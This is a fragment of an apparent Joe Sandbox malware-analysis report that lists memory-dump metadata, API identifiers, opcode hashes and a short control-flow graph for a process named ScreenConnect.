                                                                                                                                                                                • Source File: 0000000E.00000002.2533314715.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ff848f40000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MitigationPolicyProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1088084561-0
                                                                                                                                                                                • Opcode ID: 52ab1e3d8754e2a7d4d25e9dcbceb077c05a53a4dbb3b04324c93a78b9ded402
                                                                                                                                                                                • Instruction ID: 8f48142ba402de73707b82593583376dad4906e2273a459a8cc968bcc6832430
                                                                                                                                                                                • Opcode Fuzzy Hash: 52ab1e3d8754e2a7d4d25e9dcbceb077c05a53a4dbb3b04324c93a78b9ded402
                                                                                                                                                                                • Instruction Fuzzy Hash: 0441563191CB488FEB14AFA89C4A5E97BF0EF65750F00017FE049C3292DF68A846CB95

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1365 7ff848f43aa2-7ff848f480ef 1367 7ff848f480f6-7ff848f48150 SetProcessMitigationPolicy 1365->1367 1368 7ff848f48158-7ff848f48187 1367->1368 1369 7ff848f48152 1367->1369 1369->1368
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.2533314715.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ff848f40000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MitigationPolicyProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1088084561-0
                                                                                                                                                                                • Opcode ID: 1140de9e8585e7afb96131391540e5bcfa84b6606e5be4fbf07b558a0783237d
                                                                                                                                                                                • Instruction ID: 656a280f07d16c5b80d6c6ed534e36683fb13ed49cb00fbcd534b7abd8c5a60d
                                                                                                                                                                                • Opcode Fuzzy Hash: 1140de9e8585e7afb96131391540e5bcfa84b6606e5be4fbf07b558a0783237d
                                                                                                                                                                                • Instruction Fuzzy Hash: E421D73191CB188FDB18AF9CD84A6FA77E0EB65711F00413FE04AD3651DB74B8458B95